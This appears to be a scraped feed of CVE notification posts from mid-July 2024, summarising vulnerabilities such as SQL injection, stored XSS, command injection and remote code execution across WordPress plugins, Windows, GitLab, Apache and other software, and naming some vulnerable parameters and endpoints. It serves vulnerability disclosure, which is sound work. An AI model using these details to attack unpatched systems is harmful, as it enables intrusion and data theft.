🚨 CVE-2024-30213StoneFly Storage Concentrator (SC and SCVM) before 8.0.4.26 allows remote authenticated users to achieve Command Injection via a Ping URL, leading to remote code execution.🎖@cveNotify |
|
| 2024-07-12 22:37:24 |
🚨 CVE-2024-5902The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name parameter in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in feedback form responses that will execute whenever a high-privileged user tries to view them.🎖@cveNotify |
|
| 2024-07-12 21:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-12 20:37:24 |
🚨 CVE-2023-41093Use After Free vulnerability in Silicon Labs Bluetooth SDK on 32 bit, ARM may allow an attacker with precise timing capabilities to intercept a small number of packets intended for a recipient that has left the network.This issue affects Silabs Bluetooth SDK: through 8.0.0.🎖@cveNotify |
|
| 2024-07-12 19:37:24 |
🚨 CVE-2024-2746Incomplete fix for CVE-2024-1929The problem with CVE-2024-1929 was that the dnf5 D-Bus daemon accepted arbitrary configuration parameters from unprivileged users, which allowed alocal root exploit by tricking the daemon into loading a user controlled "plugin". All of this happened before Polkit authentication was even started.The dnf5 library code does not check whether non-root users control the directory in question. On one hand, this poses a Denial-of-Service attack vector by making the daemonoperate on a blocking file (e.g. named FIFO special file) or a very large filethat causes an out-of-memory situation (e.g. /dev/zero). On the other hand, this can be used to let the daemon process privileged files like /etc/shadow.The file in question is parsed as an INI file. Error diagnostics resulting from parsing privileged files could cause information leaks, if these diagnosticsare accessible to unprivileged users. In the case of libdnf5, no such user accessible diagnostics should exist, though.Also, a local attacker can place a valid repository configuration file in this directory. This configuration file allows to specifya plethora of additional configuration options. This makes various additional code paths in libdnf5 accessible to the attacker.🎖@cveNotify |
|
| 2024-07-12 19:07:46 |
🚨 CVE-2024-40541my-springsecurity-plus before v2024.07.03 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /api/dept/build.🎖@cveNotify |
|
| 2024-07-12 19:07:45 |
🚨 CVE-2024-40539my-springsecurity-plus before v2024.07.03 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /api/user.🎖@cveNotify |
|
| 2024-07-12 19:07:44 |
🚨 CVE-2024-40521SeaCMS 12.9 has a remote code execution vulnerability. The vulnerability is due to the fact that although admin_template.php imposes certain restrictions on the edited file, attackers can still bypass the restrictions and write code in some way, allowing authenticated attackers to exploit the vulnerability to execute arbitrary commands and gain system privileges.🎖@cveNotify |
|
| 2024-07-12 19:07:39 |
🚨 CVE-2024-40519SeaCMS 12.9 has a remote code execution vulnerability. The vulnerability is caused by admin_smtp.php directly splicing and writing the user input data into weixin.php without processing it, which allows authenticated attackers to exploit the vulnerability to execute arbitrary commands and obtain system permissions.🎖@cveNotify |
|
| 2024-07-12 19:07:38 |
🚨 CVE-2024-40518SeaCMS 12.9 has a remote code execution vulnerability. The vulnerability is caused by admin_weixin.php directly splicing and writing the user input data into weixin.php without processing it, which allows authenticated attackers to exploit the vulnerability to execute arbitrary commands and obtain system permissions.🎖@cveNotify |
|
| 2024-07-12 19:07:37 |
🚨 CVE-2024-38535Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Suricata can run out of memory when parsing crafted HTTP/2 traffic. Upgrade to 6.0.20 or 7.0.6.🎖@cveNotify |
|
| 2024-07-12 19:07:33 |
🚨 CVE-2024-37151Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Mishandling of multiple fragmented packets using the same IP ID value can lead to packet reassembly failure, which can lead to policy bypass. Upgrade to 7.0.6 or 6.0.20. When using af-packet, enable `defrag` to reduce the scope of the problem.🎖@cveNotify |
|
| 2024-07-12 19:07:32 |
🚨 CVE-2024-38011Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-12 19:07:27 |
🚨 CVE-2024-38010Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-12 19:07:26 |
🚨 CVE-2024-37989Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-12 19:07:25 |
🚨 CVE-2024-37987Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-12 19:07:24 |
🚨 CVE-2024-37986Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-12 17:37:30 |
🚨 CVE-2024-40110Sourcecodester Poultry Farm Management System v1.0 contains an Unauthenticated Remote Code Execution (RCE) vulnerability via the productimage parameter at /farm/product.php.🎖@cveNotify |
|
| 2024-07-12 17:37:29 |
🚨 CVE-2024-27183XSS vulnerability in DJ-HelpfulArticles component for Joomla.🎖@cveNotify |
|
| 2024-07-12 17:37:26 |
🚨 CVE-2023-48194Vulnerability in Tenda AC8v4 .V16.03.34.09 due to sscanf and the last digit of s8 being overwritten with \x0. After executing set_client_qos, control over the gp register can be obtained.🎖@cveNotify |
|
| 2024-07-12 17:37:25 |
🚨 CVE-2024-39171Directory Travel in PHPVibe v11.0.46 due to incomplete blacklist checksums and directory checks, which can lead to code execution via writing specific statements to .htaccess and code to a file with a .png suffix.🎖@cveNotify |
|
| 2024-07-12 17:37:24 |
🚨 CVE-2024-37082When deploying Cloud Foundry together with the haproxy-boshrelease and using a non default configuration, it might be possible to craft HTTP requests that bypass mTLS authentication to Cloud Foundry applications. You are affected if you have route-services enabled in routing-release and have configured the haproxy-boshrelease property “ha_proxy.forwarded_client_cert” to “forward_only_if_route_service”.🎖@cveNotify |
|
| 2024-07-12 17:07:42 |
🚨 CVE-2024-2602CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('PathTraversal') vulnerability exists that could result in remote code execution when an authenticateduser executes a saved project file that has been tampered by a malicious actor.🎖@cveNotify |
|
| 2024-07-12 17:07:41 |
🚨 CVE-2024-6385An issue was discovered in GitLab CE/EE affecting all versions starting from 15.8 prior to 16.11.6, starting from 17.0 prior to 17.0.4, and starting from 17.1 prior to 17.1.2, which allows an attacker to trigger a pipeline as another user under certain circumstances.🎖@cveNotify |
|
| 2024-07-12 17:07:37 |
🚨 CVE-2024-5470An issue was discovered in GitLab CE/EE affecting all versions starting from 17.0 prior to 17.0.4 and from 17.1 prior to 17.1.2 where a Guest user with `admin_push_rules` permission may have been able to create project-level deploy tokens.🎖@cveNotify |
|
| 2024-07-12 17:07:36 |
🚨 CVE-2024-2880An issue was discovered in GitLab CE/EE affecting all versions starting from 16.5 prior to 16.11.6, starting from 17.0 prior to 17.0.4, and starting from 17.1 prior to 17.1.2 in which a user with `admin_group_member` custom role permission could ban group members.🎖@cveNotify |
|
| 2024-07-12 17:07:35 |
🚨 CVE-2024-6138The Secure Copy Content Protection and Content Locking WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-07-12 17:07:32 |
🚨 CVE-2024-6026The Slider by 10Web WordPress plugin before 1.2.56 does not sanitise and escape some of its Slide options, which could allow authenticated users with access to the Sliders (by default Administrator, however this can be changed via the Slider by 10Web WordPress plugin before 1.2.56's options) and the ability to add images (Editor+) to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-12 17:07:31 |
🚨 CVE-2024-4655The Ultimate Blocks WordPress plugin before 3.1.9 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-12 17:07:30 |
🚨 CVE-2024-22280VMware Aria Automation does not apply correct input validation which allows for SQL-injection in the product. An authenticated malicious user could enter specially crafted SQL queries and perform unauthorised read/write operations in the database.🎖@cveNotify |
|
| 2024-07-12 17:07:26 |
🚨 CVE-2024-0619The Payflex Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the payment_callback() function in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to update the status of orders, which can potentially lead to revenue loss.🎖@cveNotify |
|
| 2024-07-12 17:07:25 |
🚨 CVE-2024-6222In Docker Desktop before v4.29.0, an attacker who has gained access to the Docker Desktop VM through a container breakout can further escape to the host by passing extensions and dashboard related IPC messages.Docker Desktop v4.29.0 https://docs.docker.com/desktop/release-notes/#4290 fixes the issue on MacOS, Linux and Windows with Hyper-V backend.As exploitation requires "Allow only extensions distributed through the Docker Marketplace" to be disabled, Docker Desktop v4.31.0 https://docs.docker.com/desktop/release-notes/#4310 additionally changes the default configuration to enable this setting by default.🎖@cveNotify |
|
| 2024-07-12 17:07:24 |
🚨 CVE-2024-39698electron-updater allows for automatic updates for Electron apps. The file `packages/electron-updater/src/windowsExecutableCodeSignatureVerifier.ts` implements the signature validation routine for Electron applications on Windows. Because of the surrounding shell, a first pass by `cmd.exe` expands any environment variable found in command-line above. This creates a situation where `verifySignature()` can be tricked into validating the certificate of a different file than the one that was just downloaded. If the step is successful, the malicious update will be executed even if its signature is invalid. This attack assumes a compromised update manifest (server compromise, Man-in-the-Middle attack if fetched over HTTP, Cross-Site Scripting to point the application to a malicious updater server, etc.). The patch is available starting from 6.3.0-alpha.6.🎖@cveNotify |
|
| 2024-07-12 16:07:25 |
🚨 CVE-2024-38086Azure Kinect SDK Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-12 16:07:24 |
🚨 CVE-2024-38085Windows Graphics Component Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-12 15:37:31 |
🚨 CVE-2024-39536A Missing Release of Memory after Effective Lifetime vulnerability in the Periodic Packet Management Daemon (ppmd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated adjacent attacker to cause a Denial-of-Service (DoS).When a BFD session configured with authentication flaps, ppmd memory can leak. Whether the leak happens depends on a race condition which is outside the attackers control. This issue only affects BFD operating in distributed aka delegated (which is the default behavior) or inline mode.Whether the leak occurs can be monitored with the following CLI command:> show ppm request-queueFPC Pending-requestfpc0 2request-total-pending: 2where a continuously increasing number of pending requests is indicative of the leak. This issue affects:Junos OS: * All versions before 21.2R3-S8, * 21.4 versions before 21.4R3-S7, * 22.1 versions before 22.1R3-S4, * 22.2 versions before 22.2R3-S4, * 22.3 versions before 22.3R3, * 22.4 versions before 22.4R2-S2, 22.4R3.Junos OS Evolved: * All versions before 21.2R3-S8-EVO, * 21.4-EVO versions before 21.4R3-S7-EVO, * 22.2-EVO versions before 22.2R3-S4-EVO, * 22.3-EVO versions before 22.3R3-EVO, * 22.4-EVO versions before 22.4R3-EVO.🎖@cveNotify |
|
| 2024-07-12 15:37:30 |
🚨 CVE-2024-38091Microsoft WS-Discovery Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-07-12 15:37:27 |
🚨 CVE-2024-5802The URL Shortener by Myhop WordPress plugin through 1.0.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-07-12 15:37:26 |
🚨 CVE-2024-37554Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CodeAstrology Team UltraAddons Elementor Lite (Header & Footer Builder, Menu Builder, Cart Icon, Shortcode).This issue affects UltraAddons Elementor Lite (Header & Footer Builder, Menu Builder, Cart Icon, Shortcode): from n/a through 1.1.6.🎖@cveNotify |
|
| 2024-07-12 15:37:25 |
🚨 CVE-2023-36091Authentication Bypass vulnerability in D-Link DIR-895 FW102b07 allows remote attackers to gain escalated privileges via via function phpcgi_main in cgibin. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-12 15:07:30 |
🚨 CVE-2024-31957A vulnerability was discovered in Samsung Mobile Processors Exynos 2200 and Exynos 2400 where they lack a check for the validation of native handles, which can result in a DoS(Denial of Service) attack by unmapping an invalid length.🎖@cveNotify |
|
| 2024-07-12 15:07:26 |
🚨 CVE-2024-27362A vulnerability was discovered in Samsung Mobile Processors Exynos 1280, Exynos 2200, Exynos 1330, Exynos 1380, and Exynos 2400 where they do not properly check the length of the data, which can lead to a Information disclosure.🎖@cveNotify |
|
| 2024-07-12 15:07:25 |
🚨 CVE-2024-38092Azure CycleCloud Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-12 15:07:24 |
🚨 CVE-2024-6171The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 1.5.112 due to insufficient IP address validation and/or use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to bypass antispam functionality in the Form Builder widgets.🎖@cveNotify |
|
| 2024-07-12 14:37:43 |
🚨 CVE-2024-36522The default configuration of XSLTResourceStream.java is vulnerable to remote code execution via XSLT injection when processing input from an untrusted source without validation.Users are recommended to upgrade to versions 10.1.0, 9.18.0 or 8.16.0, which fix this issue.🎖@cveNotify |
|
| 2024-07-12 14:37:42 |
🚨 CVE-2024-6169The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘username’ parameter in all versions up to, and including, 1.5.112 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above and granted plugin setting edit permissions by an administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-12 14:37:41 |
🚨 CVE-2024-4667The Blog, Posts and Category Filter for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post and Category Filter widget in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied 'post_types' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-12 14:37:37 |
🚨 CVE-2024-39884A regression in the core of Apache HTTP Server 2.4.60 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.Users are recommended to upgrade to version 2.4.61, which fixes this issue.🎖@cveNotify |
|
| 2024-07-12 14:37:36 |
🚨 CVE-2024-39573Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly setup URL's to be handled by mod_proxy.Users are recommended to upgrade to version 2.4.60, which fixes this issue.🎖@cveNotify |
|
| 2024-07-12 14:37:31 |
🚨 CVE-2024-38476Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.Users are recommended to upgrade to version 2.4.60, which fixes this issue.🎖@cveNotify |
|
| 2024-07-12 13:37:39 |
🚨 CVE-2024-39494In the Linux kernel, the following vulnerability has been resolved:ima: Fix use-after-free on a dentry's dname.name->d_name.name can change on rename and the earlier value can be freed;there are conditions sufficient to stabilize it (->d_lock on dentry,->d_lock on its parent, ->i_rwsem exclusive on the parent's inode,rename_lock), but none of those are met at any of the sites. Take a stablesnapshot of the name instead.🎖@cveNotify |
|
| 2024-07-12 13:37:32 |
🚨 CVE-2024-6052Stored XSS in Checkmk before versions 2.3.0p10, 2.2.0p29, 2.1.0p45, and 2.0.0 (EOL) allows users to execute arbitrary scripts by injecting HTML elements🎖@cveNotify |
|
| 2024-07-12 13:37:31 |
🚨 CVE-2018-1000040In Artifex MuPDF 1.12.0 and earlier, multiple use of uninitialized value bugs in the PDF parser could allow an attacker to cause a denial of service (crash) or influence program flow via a crafted file.🎖@cveNotify |
|
| 2024-07-12 13:37:26 |
🚨 CVE-2018-1000038In Artifex MuPDF 1.12.0 and earlier, a stack buffer overflow in function pdf_lookup_cmap_full in pdf/pdf-cmap.c could allow an attacker to execute arbitrary code via a crafted file.🎖@cveNotify |
|
| 2024-07-12 13:37:25 |
🚨 CVE-2017-7264Use-after-free vulnerability in the fz_subsample_pixmap function in fitz/pixmap.c in Artifex MuPDF 1.10a allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted document.🎖@cveNotify |
|
| 2024-07-12 11:37:25 |
🚨 CVE-2024-6328The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.14.7. This is due to insufficient verification on the 'phone' parameter of the 'firebase_sms_login' and 'firebase_sms_login_v2' functions. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email address or phone number. Additionally, if a new email address is supplied, a new user account is created with the default role, even if registration is disabled.🎖@cveNotify |
|
| 2024-07-12 11:37:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-07-12 10:37:25 |
🚨 CVE-2024-3799Insecure handling of POST header parameter body included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause a shell command execution.This issue affects Phoniebox in all releases through 2.7. Newer 2.x releases were not tested, but they might also be vulnerable. Phoniebox in version 3.0 and higher are not affected.🎖@cveNotify |
|
| 2024-07-12 10:37:24 |
🚨 CVE-2024-3798Insecure handling of GET header parameter file included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will cause one of the following (depending on the chosen payload): shell command execution, reflected XSS or cross-site request forgery.This issue affects Phoniebox in all releases through 2.7. Newer 2.x releases were not tested, but they might also be vulnerable. Phoniebox in version 3.0 and higher are not affected.🎖@cveNotify |
|
| 2024-07-12 09:37:25 |
🚨 CVE-2024-32085Cross-Site Request Forgery (CSRF) vulnerability in AitThemes Citadela Listing.This issue affects Citadela Listing: from n/a before 5.20.0.🎖@cveNotify |
|
| 2024-07-12 08:37:32 |
🚨 CVE-2024-5712A Cross-Site Request Forgery (CSRF) vulnerability was identified in the stitionai/devika application, affecting the latest version. This vulnerability allows attackers to perform unauthorized actions in the context of a victim's browser, such as deleting projects or changing application settings, without any CSRF protection implemented. Successful exploitation disrupts the integrity and availability of the application and its data.🎖@cveNotify |
|
| 2024-07-12 08:37:26 |
🚨 CVE-2024-5820An unprotected WebSocket connection in the latest version of stitionai/devika (commit ecee79f) allows a malicious website to connect to the backend and issue commands on behalf of the user. The backend serves all listeners on the given socket, enabling any such malicious website to intercept all communication between the user and the backend. This vulnerability can lead to unauthorized command execution and potential server-side request forgery.🎖@cveNotify |
|
| 2024-07-12 08:37:25 |
🚨 CVE-2024-5334A local file read vulnerability exists in the stitionai/devika repository, affecting the latest version. The vulnerability is due to improper handling of the 'snapshot_path' parameter in the '/api/get-browser-snapshot' endpoint. An attacker can exploit this vulnerability by crafting a request with a malicious 'snapshot_path' parameter, leading to arbitrary file read from the system. This issue impacts the security of the application by allowing unauthorized access to sensitive files on the server.🎖@cveNotify |
|
| 2024-07-12 08:37:24 |
🚨 CVE-2024-31365Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themify Post Type Builder (PTB) allows Reflected XSS.This issue affects Post Type Builder (PTB): from n/a before 2.1.1.🎖@cveNotify |
|
| 2024-07-12 07:37:24 |
🚨 CVE-2024-6588The PowerPress Podcasting plugin by Blubrry plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘media_url’ parameter in all versions up to, and including, 11.9.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-12 06:37:37 |
🚨 CVE-2024-6024The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when deleting groups or emails, which could allow attackers to make a logged in admin remove them via a CSRF attack🎖@cveNotify |
|
| 2024-07-12 06:37:31 |
🚨 CVE-2024-6023The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when adding emails, which could allow attackers to make a logged in admin perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-07-12 06:37:30 |
🚨 CVE-2024-5626The Inline Related Posts WordPress plugin before 3.7.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-12 06:37:29 |
🚨 CVE-2024-4753The WP Secure Maintenance WordPress plugin before 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-12 06:37:26 |
🚨 CVE-2024-3112The Quotes and Tips by BestWebSoft WordPress plugin before 1.45 does not properly validate image files uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-12 06:37:25 |
🚨 CVE-2024-2430The Website Content in Page or Post WordPress plugin before 2024.04.09 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-12 06:37:24 |
🚨 CVE-2024-0974The Social Media Widget WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-12 04:37:24 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-07-12 03:37:24 |
🚨 CVE-2024-1375The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing nonce check on the save_bulkdatas function in all versions up to, and including, 5.9.5. This makes it possible for unauthenticated attackers to update post_meta_data via a forged request, granted they can trick a logged-in user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-12 00:37:26 |
🚨 CVE-2024-6396Path Traversal: '\..\filename' in aimhubio/aim🎖@cveNotify |
|
| 2024-07-11 22:37:25 |
🚨 CVE-2024-5178ServiceNow has addressed a sensitive file read vulnerability that was identified in the Washington DC, Vancouver, and Utah Now Platform releases. This vulnerability could allow an administrative user to gain unauthorized access to sensitive files on the web application server. The vulnerability is addressed in the listed patches and hot fixes, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-11 22:37:24 |
🚨 CVE-2024-4879ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-11 21:37:25 |
🚨 CVE-2022-29946NATS.io NATS Server before 2.8.2 and Streaming Server before 0.24.6 could allow a remote attacker to bypass security restrictions, caused by the failure to enforce negative user permissions in one scenario. By using a queue subscription on the wildcard, an attacker could exploit this vulnerability to allow denied subjects.🎖@cveNotify |
|
| 2024-07-11 21:37:24 |
🚨 CVE-2023-39985** UNSUPPORTED WHEN ASSIGNED ** Out-of-bounds Write vulnerability in Hitachi EH-VIEW (Designer) allows local attackers to potentially execute arbitray code on affected EH-VIEW installations. User interaction is required to exploit the vulnerabilities in that the user must open a malicious file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-11 20:37:30 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-11 20:37:26 |
🚨 CVE-2023-5146** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000 and DAR-8000 up to 20151231 and classified as critical. Affected by this issue is some unknown functionality of the file /sysmanage/updatelib.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-240242 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-07-11 20:37:25 |
🚨 CVE-2023-36307ZPLGFA 1.1.1 allows attackers to cause a panic (because of an integer index out of range during a ConvertToGraphicField call) via an image of zero width. NOTE: it is unclear whether there are common use cases in which this panic could have any security consequence🎖@cveNotify |
|
| 2024-07-11 20:37:24 |
🚨 CVE-2022-290727-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. NOTE: multiple third parties have reported that no privilege escalation can occur🎖@cveNotify |
|
| 2024-07-11 19:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-11 18:37:44 |
🚨 CVE-2024-38057Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:43 |
🚨 CVE-2024-38055Microsoft Windows Codecs Library Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:39 |
🚨 CVE-2024-38053Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:38 |
🚨 CVE-2024-38051Windows Graphics Component Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:37 |
🚨 CVE-2024-38050Windows Workstation Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:33 |
🚨 CVE-2024-38049Windows Distributed Transaction Coordinator Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:32 |
🚨 CVE-2024-38048Windows Network Driver Interface Specification (NDIS) Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:31 |
🚨 CVE-2024-38044DHCP Server Service Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-11 18:37:30 |
🚨 CVE-2023-51105A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in function bmp_decompress_rle4() of load-bmp.c.🎖@cveNotify |
|
| 2024-07-11 18:37:27 |
🚨 CVE-2023-51104A floating point exception (divide-by-zero) vulnerability was discovered in Artifex MuPDF 1.23.4 in function pnm_binary_read_image() of load-pnm.c when span equals zero.🎖@cveNotify |
|
| 2024-07-11 18:37:26 |
🚨 CVE-2021-29098Multiple uninitialized pointer vulnerabilities when parsing a specially crafted file in Esri ArcReader, ArcGIS Desktop, ArcGIS Engine 10.8.1 (and earlier) and ArcGIS Pro 2.7 (and earlier) allow an unauthenticated attacker to achieve arbitrary code execution in the context of the current user.🎖@cveNotify |
|
| 2024-07-11 18:37:25 |
🚨 CVE-2013-7232SQL injection vulnerability in ESRI ArcGIS for Server through 10.2 allows remote attackers to execute arbitrary SQL commands via unspecified input to the map or feature service.🎖@cveNotify |
|
| 2024-07-11 18:07:32 |
🚨 CVE-2013-5222Multiple cross-site scripting (XSS) vulnerabilities in ESRI ArcGIS for Server 10.1 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-07-11 18:07:26 |
🚨 CVE-2013-5221The mobile-upload feature in Esri ArcGIS for Server 10.1 through 10.2 allows remote authenticated users to upload .exe files by leveraging (1) publisher or (2) administrator privileges.🎖@cveNotify |
|
| 2024-07-11 18:07:25 |
🚨 CVE-2007-1770Buffer overflow in the ArcSDE service (giomgr) in Environmental Systems Research Institute (ESRI) ArcGIS before 9.2 Service Pack 2, when using three tiered ArcSDE configurations, allows remote attackers to cause a denial of service (giomgr crash) and execute arbitrary code via long parameters in crafted requests.🎖@cveNotify |
|
